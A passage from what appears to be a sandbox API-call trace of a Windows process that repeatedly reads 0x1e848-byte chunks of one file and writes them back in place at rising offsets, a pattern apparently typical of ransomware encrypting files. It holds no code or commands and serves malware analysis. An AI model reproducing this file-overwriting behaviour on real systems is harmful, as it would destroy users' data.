(HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.725] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x25ab8e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.725] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.736] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x25ab8e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.736] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.737] GetProcessHeap () returned 0x500000 [0113.737] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.737] GetProcessHeap () returned 0x500000 [0113.737] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.737] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x25e8970, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.737] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.759] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x25e8970, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.759] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.761] GetProcessHeap () returned 0x500000 [0113.761] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.761] GetProcessHeap () returned 0x500000 [0113.761] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.761] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2625a00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.761] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.771] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2625a00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.771] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.772] GetProcessHeap () returned 0x500000 [0113.772] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.772] GetProcessHeap () returned 0x500000 [0113.772] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.772] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2662a90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.772] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.781] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2662a90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.781] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.782] GetProcessHeap () returned 0x500000 [0113.782] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.782] GetProcessHeap () returned 0x500000 [0113.782] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.782] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x269fb20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.782] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.795] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x269fb20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.795] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.796] GetProcessHeap () returned 0x500000 [0113.796] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.796] GetProcessHeap () returned 0x500000 [0113.796] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.796] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x26dcbb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.796] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.806] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x26dcbb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.806] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.807] GetProcessHeap () returned 0x500000 [0113.807] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.807] GetProcessHeap () returned 0x500000 [0113.807] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.807] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2719c40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.807] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.843] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2719c40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.843] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.844] GetProcessHeap () returned 0x500000 [0113.844] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.844] GetProcessHeap () returned 0x500000 [0113.844] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.844] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2756cd0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.844] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.854] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2756cd0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.854] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.855] GetProcessHeap () returned 0x500000 [0113.855] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.855] GetProcessHeap () returned 0x500000 [0113.855] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.855] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2793d60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.855] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.867] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2793d60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.867] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.868] GetProcessHeap () returned 0x500000 [0113.868] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.868] GetProcessHeap () returned 0x500000 [0113.868] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.868] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x27d0df0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.868] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.879] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x27d0df0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.879] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.880] GetProcessHeap () returned 0x500000 [0113.880] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.880] GetProcessHeap () returned 0x500000 [0113.880] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.880] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x280de80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.880] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.949] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x280de80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.949] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.950] GetProcessHeap () returned 0x500000 [0113.950] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.950] GetProcessHeap () returned 0x500000 [0113.950] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.950] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x284af10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.950] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.960] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x284af10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.960] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.960] GetProcessHeap () returned 0x500000 [0113.960] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.960] GetProcessHeap () returned 0x500000 [0113.960] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.961] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2887fa0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.961] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.970] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2887fa0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.970] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.970] GetProcessHeap () returned 0x500000 [0113.970] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.970] GetProcessHeap () returned 0x500000 [0113.970] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.970] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x28c5030, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.970] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0113.979] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x28c5030, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.979] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0113.980] GetProcessHeap () returned 0x500000 [0113.980] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0113.980] GetProcessHeap () returned 0x500000 [0113.980] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0113.980] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x29020c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.980] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.002] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x29020c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.002] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.003] GetProcessHeap () returned 0x500000 [0114.003] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.003] GetProcessHeap () returned 0x500000 [0114.003] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.003] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x293f150, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.003] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.016] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x293f150, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.016] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.017] GetProcessHeap () returned 0x500000 [0114.017] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.017] GetProcessHeap () returned 0x500000 [0114.017] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.017] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x297c1e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.017] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.027] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x297c1e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.027] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.034] GetProcessHeap () returned 0x500000 [0114.034] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.036] GetProcessHeap () returned 0x500000 [0114.036] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.036] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x29b9270, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.036] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.058] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x29b9270, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.058] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.059] GetProcessHeap () returned 0x500000 [0114.059] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.059] GetProcessHeap () returned 0x500000 [0114.059] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.059] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x29f6300, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.059] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.076] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x29f6300, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.077] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.078] GetProcessHeap () returned 0x500000 [0114.078] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.078] GetProcessHeap () returned 0x500000 [0114.078] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.078] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2a33390, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.078] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.088] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2a33390, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.088] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.089] GetProcessHeap () returned 0x500000 [0114.089] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.089] GetProcessHeap () returned 0x500000 [0114.089] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.089] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2a70420, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.089] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.111] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2a70420, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.111] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.111] GetProcessHeap () returned 0x500000 [0114.111] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.111] GetProcessHeap () returned 0x500000 [0114.111] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.111] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2aad4b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.112] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.122] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2aad4b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.122] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.123] GetProcessHeap () returned 0x500000 [0114.123] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0114.123] GetProcessHeap () returned 0x500000 [0114.123] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0114.123] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2aea540, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.123] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0114.188] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x2aea540, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.188] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0114.190] GetProcessHeap () returned 0x500000 [0114.190] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 